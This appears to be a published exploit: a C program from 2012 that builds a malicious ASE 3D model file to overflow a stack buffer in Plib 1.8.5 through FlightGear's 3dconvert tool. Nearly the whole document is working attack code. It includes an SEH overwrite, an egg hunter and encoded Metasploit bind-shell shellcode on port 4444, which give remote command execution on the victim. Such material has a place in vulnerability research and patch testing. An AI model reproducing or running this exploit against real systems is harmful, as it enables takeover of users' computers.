PLIB 1.8.5 Buffer Overflow

`/*  
# Exploit Title: Plib + flightgear 3dconvert exploit  
# Date: 08/10/2012  
# Author: Andres Gomez  
# Software Links:  
# Plib: http://plib.sourceforge.net/  
# flightgear: http://www.flightgear.org/  
# 3dconvert: ftp://ftp.ihg.uni-duisburg.de/FlightGear/Win32/old/3dconvert-win32.zip  
# Version: Plib 1.8.5  
# Tested on: Windows XP Service Pack 3 Spanish  
*/  
  
/*  
  
Plib is prone to stack based Buffer overflow in the error function in ssg/ssgParser.cxx when it loads  
3d model files as X (Direct x), ASC, ASE, ATG, and OFF.  
  
This exploit uses flightgear's utility 3dconvert. It creates a corrupted ASE file "test.ase", just run:  
  
FlightGear\bin\Win32\3dconvert.exe test.ase test.obj  
  
*/  
  
  
#include <stdio.h>  
#include <stdlib.h>  
  
/*  
Shellcode: msfpayload windows/shell_bind_tcp LPORT=4444 R | ./msfencode -e x86/alpha_mixed C  
*/  
  
unsigned char shellcode[] =  
"\x89\xe0\xdd\xc6\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"  
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"  
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"  
"\x42\x75\x4a\x49\x69\x6c\x5a\x48\x4f\x79\x33\x30\x75\x50"  
"\x67\x70\x71\x70\x4b\x39\x78\x65\x45\x61\x4a\x72\x71\x74"  
"\x6c\x4b\x76\x32\x44\x70\x4e\x6b\x73\x62\x46\x6c\x6e\x6b"  
"\x36\x32\x66\x74\x4c\x4b\x50\x72\x47\x58\x36\x6f\x4c\x77"  
"\x50\x4a\x54\x66\x35\x61\x79\x6f\x45\x61\x4b\x70\x6e\x4c"  
"\x47\x4c\x31\x71\x33\x4c\x35\x52\x56\x4c\x31\x30\x6a\x61"  
"\x58\x4f\x34\x4d\x45\x51\x79\x57\x4d\x32\x6c\x30\x32\x72"  
"\x61\x47\x4e\x6b\x66\x32\x44\x50\x4e\x6b\x47\x32\x37\x4c"  
"\x55\x51\x6e\x30\x6e\x6b\x61\x50\x32\x58\x6e\x65\x79\x50"  
"\x34\x34\x73\x7a\x46\x61\x5a\x70\x46\x30\x6e\x6b\x72\x68"  
"\x66\x78\x6c\x4b\x63\x68\x55\x70\x66\x61\x78\x53\x49\x73"  
"\x75\x6c\x77\x39\x6c\x4b\x64\x74\x6c\x4b\x57\x71\x7a\x76"  
"\x45\x61\x39\x6f\x76\x51\x6b\x70\x4e\x4c\x5a\x61\x68\x4f"  
"\x64\x4d\x66\x61\x4a\x67\x45\x68\x39\x70\x70\x75\x5a\x54"  
"\x43\x33\x51\x6d\x58\x78\x45\x6b\x71\x6d\x47\x54\x54\x35"  
"\x7a\x42\x53\x68\x4e\x6b\x66\x38\x44\x64\x53\x31\x4e\x33"  
"\x43\x56\x4c\x4b\x56\x6c\x32\x6b\x4e\x6b\x36\x38\x77\x6c"  
"\x37\x71\x4a\x73\x6e\x6b\x66\x64\x4c\x4b\x46\x61\x78\x50"  
"\x4c\x49\x50\x44\x36\x44\x71\x34\x63\x6b\x53\x6b\x33\x51"  
"\x46\x39\x70\x5a\x70\x51\x49\x6f\x49\x70\x32\x78\x61\x4f"  
"\x70\x5a\x6c\x4b\x67\x62\x6a\x4b\x4d\x56\x43\x6d\x52\x48"  
"\x67\x43\x46\x52\x47\x70\x43\x30\x65\x38\x50\x77\x54\x33"  
"\x45\x62\x31\x4f\x71\x44\x65\x38\x62\x6c\x53\x47\x34\x66"  
"\x53\x37\x39\x6f\x7a\x75\x6d\x68\x4a\x30\x35\x51\x53\x30"  
"\x45\x50\x76\x49\x78\x44\x46\x34\x56\x30\x72\x48\x56\x49"  
"\x4b\x30\x62\x4b\x43\x30\x39\x6f\x48\x55\x42\x70\x50\x50"  
"\x76\x30\x52\x70\x73\x70\x70\x50\x51\x50\x62\x70\x75\x38"  
"\x39\x7a\x36\x6f\x6b\x6f\x39\x70\x69\x6f\x48\x55\x6e\x69"  
"\x58\x47\x35\x61\x79\x4b\x66\x33\x30\x68\x56\x62\x73\x30"  
"\x37\x61\x63\x6c\x6c\x49\x6a\x46\x62\x4a\x64\x50\x73\x66"  
"\x72\x77\x51\x78\x6a\x62\x49\x4b\x46\x57\x42\x47\x4b\x4f"  
"\x39\x45\x73\x63\x61\x47\x35\x38\x58\x37\x69\x79\x30\x38"  
"\x59\x6f\x69\x6f\x4a\x75\x61\x43\x31\x43\x53\x67\x30\x68"  
"\x62\x54\x68\x6c\x65\x6b\x69\x71\x59\x6f\x68\x55\x56\x37"  
"\x4d\x59\x7a\x67\x53\x58\x71\x65\x72\x4e\x42\x6d\x45\x31"  
"\x6b\x4f\x68\x55\x43\x58\x53\x53\x42\x4d\x35\x34\x77\x70"  
"\x4c\x49\x69\x73\x42\x77\x42\x77\x70\x57\x46\x51\x49\x66"  
"\x30\x6a\x64\x52\x56\x39\x66\x36\x68\x62\x69\x6d\x75\x36"  
"\x78\x47\x67\x34\x61\x34\x57\x4c\x67\x71\x47\x71\x4e\x6d"  
"\x63\x74\x54\x64\x36\x70\x48\x46\x53\x30\x42\x64\x72\x74"  
"\x46\x30\x46\x36\x76\x36\x42\x76\x53\x76\x63\x66\x42\x6e"  
"\x72\x76\x53\x66\x56\x33\x62\x76\x51\x78\x42\x59\x68\x4c"  
"\x75\x6f\x6b\x36\x49\x6f\x48\x55\x4d\x59\x4b\x50\x32\x6e"  
"\x36\x36\x61\x56\x49\x6f\x76\x50\x53\x58\x43\x38\x6f\x77"  
"\x57\x6d\x35\x30\x6b\x4f\x4b\x65\x6d\x6b\x58\x70\x78\x35"  
"\x4e\x42\x72\x76\x63\x58\x6f\x56\x4c\x55\x6d\x6d\x6d\x4d"  
"\x6b\x4f\x39\x45\x55\x6c\x37\x76\x61\x6c\x45\x5a\x4b\x30"  
"\x6b\x4b\x69\x70\x54\x35\x77\x75\x4f\x4b\x77\x37\x52\x33"  
"\x52\x52\x32\x4f\x51\x7a\x77\x70\x30\x53\x59\x6f\x6a\x75"  
"\x41\x41";  
  
unsigned char egg_hunter [] =  
"\xdb\xd9\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a"  
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"  
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"  
"\x75\x4a\x49\x43\x56\x4e\x61\x6a\x6a\x4b\x4f\x54\x4f\x51"  
"\x52\x76\x32\x42\x4a\x33\x73\x51\x48\x68\x4d\x56\x4e\x75"  
"\x6c\x66\x65\x30\x5a\x71\x64\x78\x6f\x4e\x58\x5a\x30\x52"  
"\x70\x6a\x30\x30\x50\x6c\x4b\x79\x6a\x6e\x4f\x34\x35\x7a"  
"\x4a\x4c\x6f\x62\x55\x6d\x37\x49\x6f\x6a\x47\x41\x41";  
  
unsigned char egg [] = "\x90\x50\x90\x50\x90\x50\x90\x50";  
unsigned char seh_pointer [] = "\x49\x19\xE1\x08"; // seh pointer pop pop ret;  
unsigned char short_jump [] = "\xEB\x0C\x41\x41"; // short jump;  
  
int main(int argc, char **argv) {  
  
FILE *save_fd;  
int i=0;  
  
save_fd = fopen("test.ase", "w+");  
  
if (save_fd == NULL) {  
printf("Failed to open '%s' for writing", "test.ase");  
return -1;  
}  
  
fprintf(save_fd, "*3DSMAX_ASCIIEXPORT 200\n"  
"*COMMENT \"created by SSG.\"\n"  
"*SCENE {\n"  
" *SCENE_FILENAME \"\"\n"  
" *SCENE_FIRSTFRAME 0\n"  
" *SCENE_LASTFRAME 100\n"  
" *SCENE_FRAMESPEED 30\n"  
" *SCENE_TICKSPERFRAME 160\n"  
" *SCENE_BACKGROUND_STATIC 0.0000 0.0000 0.0000\n"  
" *SCENE_AMBIENT_STATIC 0.0431 0.0431 0.0431\n"  
"}\n"  
"*MATERIAL_LIST {\n"  
" *MATERIAL_COUNT 2\n"  
" *MATERIAL 0 {\n"  
" *MATERIAL_NAME \"Material #0\"\n"  
" *MATERIAL_CLASS \"Standard\"\n"  
" *MATERIAL_AMBIENT 1.000000 1.000000 1.000000\n"  
" *MATERIAL_DIFFUSE 1.000000 1.000000 1.000000\n"  
" *MATERIAL_SPECULAR 0.502000 0.502000 0.502000\n"  
" *MATERIAL_SHINE 50.000000\n"  
" *MATERIAL_SHINESTRENGTH 50.000000\n"  
" *MATERIAL_TRANSPARENCY 0.000000\n"  
" *MATERIAL_WIRESIZE 1.0000\n"  
" *MATERIAL_SHADING Blinn\n"  
" *MATERIAL_XP_FALLOFF 0.0000\n"  
" *MATERIAL_SELFILLUM 0.0000\n"  
" *MATERIAL_TWOSIDED\n"  
" *MATERIAL_FALLOFF In\n"  
" *MATERIAL_SOFTEN\n"  
" *MATERIAL_XP_TYPE Filter\n"  
" *SUBMATERIAL ");  
for(i=0; i < 573; i++) {  
putc('\x41', save_fd);  
}  
fprintf(save_fd, "%s", short_jump);  
fprintf(save_fd, "%s", seh_pointer);  
for(i=0; i < 0x0F; i++) {  
putc('\x90', save_fd);  
}  
  
fprintf(save_fd, "%s", egg_hunter);  
for(i=0; i < 573; i++) {  
putc('\x41', save_fd);  
}  
fprintf(save_fd, "%s", egg);  
fprintf(save_fd, "%s", shellcode);  
  
fprintf(save_fd, " {\n");  
  
close(save_fd);  
  
return 0;  
}  
  
`